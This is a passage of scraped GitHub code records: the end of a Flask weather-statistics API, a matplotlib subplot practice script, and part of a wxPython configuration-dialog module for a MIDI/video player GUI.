Query the primary station from all temp observations from the previous year\n    results = session.query(Measurement.tobs).filter(Measurement.station == \"USC00519281\").filter(Measurement.date >= prev_year).all()\n    # unravel the results into a one-dimensional array and turn it into a list; then jsonify the list and return it\n    temps = list(np.ravel(results))\n    return jsonify(temps=temps)\n\n# Statistics Route-- need a start and end date, so two different routes\n@app.route(\"/api/v1.0/temp/<start>\")\n@app.route(\"/api/v1.0/temp/<start>/<end>\")\n# Create a function (no start or end for now)\ndef stats(start=None, end=None):\n    # Create a query to select min, avg, and max temps from SQLite\n    sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n    # create if-not statement to find the start and end date. Query our database using the list^ and then unravel the results\n    if not end:\n        results = session.query(*sel).filter(Measurement.date >= start).all()\n        temps = list(np.ravel(results))\n        return jsonify(temps)\n    # calculate the temp min, avg, and max with the start and end dates\n    results = session.query(*sel).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n    temps = list(np.ravel(results))\n    return jsonify(temps)\n\n","repo_name":"mabuckjr/surfs_up","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"73100349646","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport seaborn as sns\n\niris = sns.load_dataset('iris')\ntitanic = sns.load_dataset('titanic')\n\n\"\"\"\nFew advanced features\n\"\"\"\n\ndef create_sample_data():\n    x_vals = np.linspace(0,20,20)\n    y_vals = [math.sqrt(i) for i in x_vals]\n    return x_vals, y_vals\n\ndef use_subplot():\n    plt.rcParams[\"figure.figsize\"] = [12,8]\n    x_v, y_v = create_sample_data()\n    plt.subplot(2,2,1)\n    plt.plot(x_v, y_v, 'bo-')\n    plt.subplot(2,2,2)\n    plt.plot(x_v, y_v, 'rx-')\n    plt.subplot(2,2,3)\n    plt.plot(x_v, y_v, \"g*-\")\n    plt.subplot(2,2,4)\n    plt.plot(x_v, y_v,\"y^-\")\n    plt.show()\n\ndef use_for_and_save():\n    x_v, y_v = create_sample_data()\n    fix, axes = plt.subplots(nrows=4,ncols=2)\n    for rows in axes:\n        for ax1 in rows:\n            ax1.plot(x_v, y_v,'g')\n            ax1.set_title(\"sqrt\")\n    plt.show()\n\ndef ex1_func():\n    dat = np.linspace(1,60,60)\n    plt.subplot(3,1,1)\n    plt.plot(dat, np.sin(dat))\n    plt.subplot(3,1,2)\n    plt.plot(dat, np.cos(dat))\n    plt.subplot(3,1,3)\n    plt.plot(dat, np.tan(dat))\n    plt.show()\n\n\ndef start_execution():\n    #use_subplot()\n    #use_for_and_save()\n    ex1_func()\n\n\n\nif __name__==\"__main__\":\r\n    
start_execution()\n\n","repo_name":"dineshhmn/viz_learning","sub_path":"files/file2_chap3.py","file_name":"file2_chap3.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"35898893573","text":"'''\nCreated on 27. juni 2012\n\n@author: pcn\n'''\nimport wx\nfrom configuration.PlayerConfiguration import PlayerConfiguration\nfrom midi.MidiUtilities import noteToNoteString\nimport sys\n\nclass ConfigOpenDialog(wx.Dialog): #@UndefinedVariable\n def __init__(self, parent, title, sendOpenCommandCallback, configList, lastSelectedConfig):\n super(ConfigOpenDialog, self).__init__(parent=parent, title=title, size=(300, 150))\n\n self._sendOpenCommandCallback = sendOpenCommandCallback\n self._configList = configList\n self._lastSelectedConfig = lastSelectedConfig\n\n dialogSizer = wx.BoxSizer(wx.VERTICAL) #@UndefinedVariable\n self.SetBackgroundColour((180,180,180))\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Please select file to open:\") #@UndefinedVariable\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n configListSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n configListLabel = wx.StaticText(self, wx.ID_ANY, \"Configuration:\") #@UndefinedVariable\n self._configListField = wx.ComboBox(self, wx.ID_ANY, size=(200, -1), choices=[], style=wx.CB_READONLY) #@UndefinedVariable\n self._configListField.Clear()\n valueOk = False\n backupSelection = self._configList[0]\n for choice in self._configList:\n self._configListField.Append(choice)\n if(choice == self._lastSelectedConfig):\n valueOk = True\n if(valueOk == True):\n self._configListField.SetStringSelection(self._lastSelectedConfig)\n else:\n self._configListField.SetStringSelection(backupSelection)\n configListSizer.Add(configListLabel, 1, wx.ALL, 5) #@UndefinedVariable\n configListSizer.Add(self._configListField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(configListSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n\n buttonsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n loadButton = wx.Button(self, wx.ID_ANY, 'Load', size=(60,-1)) #@UndefinedVariable\n loadButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n cancelButton = wx.Button(self, wx.ID_ANY, 'Cancel', size=(60,-1)) #@UndefinedVariable\n cancelButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n buttonsSizer.Add(loadButton, 1, wx.ALL, 5) #@UndefinedVariable\n buttonsSizer.Add(cancelButton, 1, wx.ALL, 5) #@UndefinedVariable\n loadButton.Bind(wx.EVT_BUTTON, self._onLoad) #@UndefinedVariable\n cancelButton.Bind(wx.EVT_BUTTON, self._onCancel) #@UndefinedVariable\n dialogSizer.Add(buttonsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n self.SetSizer(dialogSizer)\n\n\n def _onLoad(self, event):\n self._sendOpenCommandCallback(self._configListField.GetValue())\n self.Destroy()\n\n def _onCancel(self, event):\n self.Destroy()\n\nclass ConfigNewDialog(wx.Dialog): #@UndefinedVariable\n def __init__(self, parent, title, updateConfigNameCallback, currentConfigName):\n super(ConfigNewDialog, self).__init__(parent=parent, title=title, size=(300, 120))\n\n self._updateConfigNameCallback = updateConfigNameCallback\n self._currentConfigName = currentConfigName\n\n dialogSizer = wx.BoxSizer(wx.VERTICAL) #@UndefinedVariable\n self.SetBackgroundColour((180,180,180))\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Please type new name:\") #@UndefinedVariable\n dialogSizer.Add(infoText, 
proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n configNameSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n configNameLabel = wx.StaticText(self, wx.ID_ANY, \"New name:\") #@UndefinedVariable\n self._configNameField = wx.TextCtrl(self, wx.ID_ANY, str(self._currentConfigName), size=(120, -1)) #@UndefinedVariable\n configNameSizer.Add(configNameLabel, 1, wx.ALL, 5) #@UndefinedVariable\n configNameSizer.Add(self._configNameField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(configNameSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n\n buttonsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n newButton = wx.Button(self, wx.ID_ANY, 'New', size=(60,-1)) #@UndefinedVariable\n newButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n cancelButton = wx.Button(self, wx.ID_ANY, 'Cancel', size=(60,-1)) #@UndefinedVariable\n cancelButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n buttonsSizer.Add(newButton, 1, wx.ALL, 5) #@UndefinedVariable\n buttonsSizer.Add(cancelButton, 1, wx.ALL, 5) #@UndefinedVariable\n newButton.Bind(wx.EVT_BUTTON, self._onOk) #@UndefinedVariable\n cancelButton.Bind(wx.EVT_BUTTON, self._onCancel) #@UndefinedVariable\n dialogSizer.Add(buttonsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n self.SetSizer(dialogSizer)\n\n\n def _onOk(self, event):\n self._updateConfigNameCallback(self._configNameField.GetValue())\n self.Destroy()\n\n def _onCancel(self, event):\n self.Destroy()\n\nclass ConfigGuiDialog(wx.Dialog): #@UndefinedVariable\n def __init__(self, parent, title, configurationClass, playerId):\n super(ConfigGuiDialog, self).__init__(parent=parent, title=title, size=(440, 600))\n\n self._configurationClass = configurationClass\n self._playerId = playerId\n\n dialogSizer = wx.BoxSizer(wx.VERTICAL) #@UndefinedVariable\n self.SetBackgroundColour((180,180,180))\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Player:\") #@UndefinedVariable\n boldFont = infoText.GetFont()\n boldFont.SetWeight(wx.BOLD) #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerHostName, playerWebPort = self._configurationClass.getWebConfig(self._playerId)\n\n isMidiOn = self._configurationClass.isMidiEnabled(self._playerId)\n playerMidiOnSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerMidiOnLabel = wx.StaticText(self, wx.ID_ANY, \"MIDI:\") #@UndefinedVariable\n self._playerMidiOnField = wx.CheckBox(self, wx.ID_ANY, \"Send MIDI notes from GUI to player.\") #@UndefinedVariable\n self._playerMidiOnField.SetValue(isMidiOn)\n playerMidiOnSizer.Add(playerMidiOnLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerMidiOnSizer.Add(self._playerMidiOnField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerMidiOnSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerHostNameSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerHostNameLabel = wx.StaticText(self, wx.ID_ANY, \"Host address:\") #@UndefinedVariable\n self._playerHostNameField = wx.TextCtrl(self, wx.ID_ANY, str(playerHostName), size=(120, -1)) #@UndefinedVariable\n playerHostNameSizer.Add(playerHostNameLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerHostNameSizer.Add(self._playerHostNameField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerHostNameSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerHostName, playerMidiPort, playerMode = self._configurationClass.getMidiConfig(self._playerId)\n playerMidiPortSizer = 
wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerMidiPortLabel = wx.StaticText(self, wx.ID_ANY, \"MIDI port:\") #@UndefinedVariable\n self._playerMidiPortField = wx.SpinCtrl(self, value=str(playerMidiPort), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._playerMidiPortField.SetRange(1024, 9999)\n playerMidiPortSizer.Add(playerMidiPortLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerMidiPortSizer.Add(self._playerMidiPortField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerMidiPortSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerWebPortSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerWebPortLabel = wx.StaticText(self, wx.ID_ANY, \"Web port:\") #@UndefinedVariable\n self._playerWebPortField = wx.SpinCtrl(self, value=str(playerWebPort), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._playerWebPortField.SetRange(1024, 9999)\n playerWebPortSizer.Add(playerWebPortLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerWebPortSizer.Add(self._playerWebPortField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerWebPortSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"GUI:\") #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n isAutosendOn = self._configurationClass.isAutoSendEnabled()\n autoSendOnSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n autoSendOnLabel = wx.StaticText(self, wx.ID_ANY, \"Autosend:\") #@UndefinedVariable\n self._autoSendOnField = wx.CheckBox(self, wx.ID_ANY, \"Send all configuration changes to Player.\") #@UndefinedVariable\n self._autoSendOnField.SetValue(isAutosendOn)\n autoSendOnSizer.Add(autoSendOnLabel, 1, wx.ALL, 5) #@UndefinedVariable\n autoSendOnSizer.Add(self._autoSendOnField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(autoSendOnSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n guiMidiBindBroadcast, guiMidiBindAddress, guiMidiBindPort = self._configurationClass.getMidiListenConfig()\n guiMidiBindAddressSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n guiMidiBindAddressLabel = wx.StaticText(self, wx.ID_ANY, \"Input address:\") #@UndefinedVariable\n self._guiMidiBindAddressField = wx.TextCtrl(self, wx.ID_ANY, str(guiMidiBindAddress), size=(120, -1)) #@UndefinedVariable\n guiMidiBindAddressSizer.Add(guiMidiBindAddressLabel, 1, wx.ALL, 5) #@UndefinedVariable\n guiMidiBindAddressSizer.Add(self._guiMidiBindAddressField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(guiMidiBindAddressSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n guiMidiPortSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n guiMidiPortLabel = wx.StaticText(self, wx.ID_ANY, \"Input port:\") #@UndefinedVariable\n self._guiMidiPortField = wx.SpinCtrl(self, value=str(guiMidiBindPort), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._guiMidiPortField.SetRange(1024, 9999)\n guiMidiPortSizer.Add(guiMidiPortLabel, 1, wx.ALL, 5) #@UndefinedVariable\n guiMidiPortSizer.Add(self._guiMidiPortField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(guiMidiPortSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n guiMidiBroadcastSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n guiMidiBroadcastLabel = wx.StaticText(self, wx.ID_ANY, \"Broadcast:\") #@UndefinedVariable\n self._guiMidiBroadcastField = wx.CheckBox(self, wx.ID_ANY, \"Receive broadcast packets.\") #@UndefinedVariable\n 
self._guiMidiBroadcastField.SetValue(guiMidiBindBroadcast)\n guiMidiBroadcastSizer.Add(guiMidiBroadcastLabel, 1, wx.ALL, 5) #@UndefinedVariable\n guiMidiBroadcastSizer.Add(self._guiMidiBroadcastField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(guiMidiBroadcastSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n sizeX, sizeY = self._configurationClass.getWindowSize()\n windowSizeSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n windowSizeLabel = wx.StaticText(self, wx.ID_ANY, \"GUI window size:\") #@UndefinedVariable\n self._windowSizeField = wx.TextCtrl(self, wx.ID_ANY, str(sizeX) + \",\" + str(sizeY), size=(120, -1)) #@UndefinedVariable\n windowSizeSizer.Add(windowSizeLabel, 1, wx.ALL, 5) #@UndefinedVariable\n windowSizeSizer.Add(self._windowSizeField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(windowSizeSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n posX, posY = self._configurationClass.getWindowPosition()\n windowPosSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n windowPosLabel = wx.StaticText(self, wx.ID_ANY, \"GUI window position:\") #@UndefinedVariable\n self._windowPosField = wx.TextCtrl(self, wx.ID_ANY, str(posX) + \",\" + str(posY), size=(120, -1)) #@UndefinedVariable\n windowPosSizer.Add(windowPosLabel, 1, wx.ALL, 5) #@UndefinedVariable\n windowPosSizer.Add(self._windowPosField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(windowPosSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n showDmx = self._configurationClass.isShowDMX()\n showDmxSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n showDmxLabel = wx.StaticText(self, wx.ID_ANY, \"DMX:\") #@UndefinedVariable\n self._showDmxField = wx.CheckBox(self, wx.ID_ANY, \"Show DMX in GUI.\") #@UndefinedVariable\n self._showDmxField.SetValue(showDmx)\n showDmxSizer.Add(showDmxLabel, 1, wx.ALL, 5) #@UndefinedVariable\n showDmxSizer.Add(self._showDmxField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(showDmxSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n showKinect = self._configurationClass.isShowKinect()\n showKinectSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n showKinectLabel = wx.StaticText(self, wx.ID_ANY, \"Kinect:\") #@UndefinedVariable\n self._showKinectField = wx.CheckBox(self, wx.ID_ANY, \"Show Kinect in GUI.\") #@UndefinedVariable\n self._showKinectField.SetValue(showKinect)\n showKinectSizer.Add(showKinectLabel, 1, wx.ALL, 5) #@UndefinedVariable\n showKinectSizer.Add(self._showKinectField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(showKinectSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Convertion:\") #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n ffmpegBinary = self._configurationClass.getFfmpegBinary()\n ffmpegBinarySizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n ffmpegBinaryLabel = wx.StaticText(self, wx.ID_ANY, \"ffmpeg binary:\") #@UndefinedVariable\n self._ffmpegBinaryField = wx.TextCtrl(self, wx.ID_ANY, str(ffmpegBinary), size=(120, -1)) #@UndefinedVariable\n ffmpegBinarySizer.Add(ffmpegBinaryLabel, 1, wx.ALL, 5) #@UndefinedVariable\n ffmpegBinarySizer.Add(self._ffmpegBinaryField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(ffmpegBinarySizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n ffmpegH264Options = self._configurationClass.getFfmpegH264Options()\n ffmpegOptionsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n 
ffmpegOptionsLabel = wx.StaticText(self, wx.ID_ANY, \"ffmpeg h264 options:\") #@UndefinedVariable\n self._ffmpegOptionsField = wx.TextCtrl(self, wx.ID_ANY, str(ffmpegH264Options), size=(120, -1)) #@UndefinedVariable\n ffmpegOptionsSizer.Add(ffmpegOptionsLabel, 1, wx.ALL, 5) #@UndefinedVariable\n ffmpegOptionsSizer.Add(self._ffmpegOptionsField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(ffmpegOptionsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n scaleX = self._configurationClass.getVideoScaleX()\n scaleXSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n scaleXLabel = wx.StaticText(self, wx.ID_ANY, \"Default X scale size:\") #@UndefinedVariable\n self._scaleXField = wx.SpinCtrl(self, value=str(scaleX), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._scaleXField.SetRange(-1, 8000)\n scaleXSizer.Add(scaleXLabel, 1, wx.ALL, 5) #@UndefinedVariable\n scaleXSizer.Add(self._scaleXField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(scaleXSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n scaleY = self._configurationClass.getVideoScaleY()\n scaleYSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n scaleYLabel = wx.StaticText(self, wx.ID_ANY, \"Default Y scale size:\") #@UndefinedVariable\n self._scaleYField = wx.SpinCtrl(self, value=str(scaleY), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._scaleYField.SetRange(-1, 6000)\n scaleYSizer.Add(scaleYLabel, 1, wx.ALL, 5) #@UndefinedVariable\n scaleYSizer.Add(self._scaleYField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(scaleYSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n videoDirectory = self._configurationClass.getGuiVideoDir()\n videoDirectorySizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n videoDirectoryLabel = wx.StaticText(self, wx.ID_ANY, \"Video directory:\") #@UndefinedVariable\n self._videoDirectoryField = wx.TextCtrl(self, wx.ID_ANY, str(videoDirectory), size=(120, -1)) #@UndefinedVariable\n videoDirectorySizer.Add(videoDirectoryLabel, 1, wx.ALL, 5) #@UndefinedVariable\n videoDirectorySizer.Add(self._videoDirectoryField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(videoDirectorySizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n buttonsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n newButton = wx.Button(self, wx.ID_ANY, 'Save', size=(60,-1)) #@UndefinedVariable\n newButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n cancelButton = wx.Button(self, wx.ID_ANY, 'Cancel', size=(60,-1)) #@UndefinedVariable\n cancelButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n buttonsSizer.Add(newButton, 1, wx.ALL, 5) #@UndefinedVariable\n buttonsSizer.Add(cancelButton, 1, wx.ALL, 5) #@UndefinedVariable\n newButton.Bind(wx.EVT_BUTTON, self._onOk) #@UndefinedVariable\n cancelButton.Bind(wx.EVT_BUTTON, self._onCancel) #@UndefinedVariable\n dialogSizer.Add(buttonsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n self.SetSizer(dialogSizer)\n\n\n def _onOk(self, event):\n playerHost = self._playerHostNameField.GetValue()\n midiPort = self._playerMidiPortField.GetValue()\n webPort = self._playerWebPortField.GetValue()\n midiOn = self._playerMidiOnField.GetValue()\n self._configurationClass.setPlayerConfig(self._playerId, playerHost, midiPort, webPort, midiOn)\n\n videoDir = self._videoDirectoryField.GetValue()\n ffmpegBinary = self._ffmpegBinaryField.GetValue()\n ffmpegH264Options = self._ffmpegOptionsField.GetValue()\n scaleX = self._scaleXField.GetValue()\n scaleY = 
self._scaleYField.GetValue()\n self._configurationClass.setVideoConfig(videoDir, ffmpegBinary, ffmpegH264Options, scaleX, scaleY)\n\n autoSend = self._autoSendOnField.GetValue()\n midiBcast = self._guiMidiBroadcastField.GetValue()\n midiBindAddress = self._guiMidiBindAddressField.GetValue()\n midiPort2 = self._guiMidiPortField.GetValue()\n winSize = self._windowSizeField.GetValue()\n winPos = self._windowPosField.GetValue()\n showDmx = self._showDmxField.GetValue()\n showKinect = self._showKinectField.GetValue()\n self._configurationClass.setGuiConfig(autoSend, midiBcast, midiBindAddress, midiPort2, winSize, winPos, showDmx, showKinect)\n\n self._configurationClass.saveConfig()\n wx.MessageBox('You must restart GUI to make sure all changes to take effect!', 'Info', wx.OK | wx.ICON_INFORMATION) #@UndefinedVariable\n self.Destroy()\n\n def _onCancel(self, event):\n self.Destroy()\n\nclass ConfigPlayerDialog(wx.Dialog): #@UndefinedVariable\n def __init__(self, parent, title, sendConfigCallback, configurationXmlString):\n super(ConfigPlayerDialog, self).__init__(parent=parent, title=title, size=(440, 700))\n\n self._sendConfigCallback = sendConfigCallback\n self._configurationClass = PlayerConfiguration(\"\", False)\n self._configurationClass.setFromXmlString(configurationXmlString)\n\n dialogSizer = wx.BoxSizer(wx.VERTICAL) #@UndefinedVariable\n self.SetBackgroundColour((180,180,180))\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Network:\") #@UndefinedVariable\n boldFont = infoText.GetFont()\n boldFont.SetWeight(wx.BOLD) #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerBindName = self._configurationClass.getMidiServerAddress()\n playerBindNameSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerBindNameLabel = wx.StaticText(self, wx.ID_ANY, \"MIDI bind address:\") #@UndefinedVariable\n self._playerBindNameField = wx.TextCtrl(self, wx.ID_ANY, str(playerBindName), size=(120, -1)) #@UndefinedVariable\n playerBindNameSizer.Add(playerBindNameLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerBindNameSizer.Add(self._playerBindNameField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerBindNameSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerMidiPort = self._configurationClass.getMidiServerPort()\n playerMidiPortSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerMidiPortLabel = wx.StaticText(self, wx.ID_ANY, \"MIDI port:\") #@UndefinedVariable\n self._playerMidiPortField = wx.SpinCtrl(self, value=str(playerMidiPort), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._playerMidiPortField.SetRange(1024, 9999)\n playerMidiPortSizer.Add(playerMidiPortLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerMidiPortSizer.Add(self._playerMidiPortField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerMidiPortSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n useBroadcast = self._configurationClass.getMidiServerUsesBroadcast()\n playerMidiBcastOnSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerMidiBcastOnLabel = wx.StaticText(self, wx.ID_ANY, \"Broadcast:\") #@UndefinedVariable\n self._playerMidiBcastOnField = wx.CheckBox(self, wx.ID_ANY, \"Listen for MIDI broadcast packets.\") #@UndefinedVariable\n self._playerMidiBcastOnField.SetValue(useBroadcast)\n playerMidiBcastOnSizer.Add(playerMidiBcastOnLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerMidiBcastOnSizer.Add(self._playerMidiBcastOnField, 2, wx.ALL, 5) #@UndefinedVariable\n 
dialogSizer.Add(playerMidiBcastOnSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerWebBindName = self._configurationClass.getWebServerAddress()\n playerWebBindNameSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerWebBindNameLabel = wx.StaticText(self, wx.ID_ANY, \"Web bind address:\") #@UndefinedVariable\n self._playerWebBindNameField = wx.TextCtrl(self, wx.ID_ANY, str(playerWebBindName), size=(120, -1)) #@UndefinedVariable\n playerWebBindNameSizer.Add(playerWebBindNameLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerWebBindNameSizer.Add(self._playerWebBindNameField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerWebBindNameSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerWebPort = self._configurationClass.getWebServerPort()\n playerWebPortSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerWebPortLabel = wx.StaticText(self, wx.ID_ANY, \"Web port:\") #@UndefinedVariable\n self._playerWebPortField = wx.SpinCtrl(self, value=str(playerWebPort), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._playerWebPortField.SetRange(1024, 9999)\n playerWebPortSizer.Add(playerWebPortLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerWebPortSizer.Add(self._playerWebPortField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerWebPortSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n startId, numChannels, channelWidth, listenUniverse, dmxBinaryName = self._configurationClass.getDmxSettings()\n dmxUniverseSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n dmxUniverseLabel = wx.StaticText(self, wx.ID_ANY, \"DMX Universe:\") #@UndefinedVariable\n self._dmxUniverseField = wx.SpinCtrl(self, value=str(listenUniverse), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._dmxUniverseField.SetRange(0, 1024)\n dmxUniverseSizer.Add(dmxUniverseLabel, 1, wx.ALL, 5) #@UndefinedVariable\n dmxUniverseSizer.Add(self._dmxUniverseField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(dmxUniverseSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n dmxStartIdSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n dmxStartIdLabel = wx.StaticText(self, wx.ID_ANY, \"DMX Start ID:\") #@UndefinedVariable\n self._dmxStartIdField = wx.SpinCtrl(self, value=str(startId), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._dmxStartIdField.SetRange(0, 511)\n dmxStartIdSizer.Add(dmxStartIdLabel, 1, wx.ALL, 5) #@UndefinedVariable\n dmxStartIdSizer.Add(self._dmxStartIdField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(dmxStartIdSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n dmxChannelWidthSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n dmxChannelWidthLabel = wx.StaticText(self, wx.ID_ANY, \"DMX channel width:\") #@UndefinedVariable\n self._dmxChannelWidthField = wx.SpinCtrl(self, value=str(channelWidth), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._dmxChannelWidthField.SetRange(1, 32)\n dmxChannelWidthSizer.Add(dmxChannelWidthLabel, 1, wx.ALL, 5) #@UndefinedVariable\n dmxChannelWidthSizer.Add(self._dmxChannelWidthField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(dmxChannelWidthSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n dmxNumChannelsSizer = 